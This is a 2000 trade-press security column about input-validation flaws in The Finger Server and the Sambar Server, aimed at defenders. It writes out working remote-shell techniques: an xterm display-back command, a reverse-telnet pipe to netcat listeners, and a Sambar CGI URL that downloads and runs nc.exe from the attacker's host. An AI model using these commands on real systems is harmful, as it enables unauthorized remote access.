Vulnerabilities in E-Comm Apps Challenge Security

SAN MATEO (04/24/2000) - We've been touting for some time the critical nature of Web and e-commerce security. Unlike traditional security risks, attacks on e-commerce are moving up the protocol stack to the application layer, effectively blinding many security detection and prevention products. The Web onslaught has only begun.

The number of Web-based vulnerabilities is climbing daily, and the number of insecure Web sites grows accordingly. In February alone, two significant vulnerabilities came out in Web applications. The two most recent problems allow unfettered remote system access. They take advantage of the tried-and-true feature present in every application: human error, the one attack your favorite security tools provider cannot defend against. Forget about your intrusion detection systems, firewalls, log analyzers, or even ISP expertise, without security savvy or vigilant personnel you'll be chasing shadows.

The Finger Server (www.glazed.org/finger), written by Scott St. Jean in 1998 but still in beta, serves as a Web-based Finger server that allows users to update their .plan file so others can view the status of particular projects.

But in early February, Iain Wade made public an input validation attack on the program's underlying Perl scripts. These types of attacks take advantage of a failure to properly filter the data passed to input fields of a program or script, thereby allowing an attacker to bypass normal handling of the data and possibly allowing code to run on the remote system.

For all intents and purposes, once an attacker can run commands on a system, the game is over. Certainly some commands are useless without privileged access, but you'd be surprised at how many people run applications as a privileged user. One of the simplest attacks to perform on vulnerable Finger server Unix systems is to take advantage of installed xterms (X Window terminals). With a single command, you can create a shell window on the remote system:

/usr/X11R6/bin/xterm -display :0 &Be sure to allow xterm capability on your system with xhost +.

If xterm is not installed on the target system, one of our favorite commands is reverse telnet. The command works by using netcat listeners on the attack system to listen on two port numbers (assume 80 and 21) and then having the remote victim system execute the following:telnet 80 | /bin/sh | telnet 21The command will establish a raw input channel on the netcat listener on port 80 and a raw output channel on the netcat listener on port 21, resulting in a remote interactive session on the victim system. The fix for the Finger server input-validation vulnerability is to upgrade to the latest beta version, 0.83 or later.

The popular, feature-rich, multithreaded Sambar Server, by Sambar Technologies Inc. (www.sambar.com), is a freeware HTTP, FTP, and proxy server for Windows NT that boasts support for numerous Web application features, including granular security controls. But, like The Finger Server, input-validation attacks appear on the feature list.

First discovered by Georgi Chorbadzhiiski, the product comes by default installed with two Windows batch scripts (hello.bat and echo.bat) that provide absolutely no input filtering. As a result, a simple "&" will shovel commands to the command processor, providing remote command execution -- all over HTTP, port 80.

To get a netcat shell from an NT system running vulnerable Sambar software, we simply use NT's default Trivial FTP client:http:///cgi-bin/hello.bat?&tftp%20i%20%20GET%20nc.exe%20c:\nc.exe&c:\nc.exe%20%20Of course you must have a running netcat listener on.

So how secure do you feel behind your firewall? Do you manually walk through each of your CGI scripts to discover input validation vulnerabilities? Let us know at security_watch@infoworld.com.

Stuart McClure is president and CTO and Joel Scambray is a managing principal at security consultant Foundstone (www.foundstone.com).

Join the newsletter!

Error: Please check your email address.

More about CGIFoundstoneSambar Technologies

Show Comments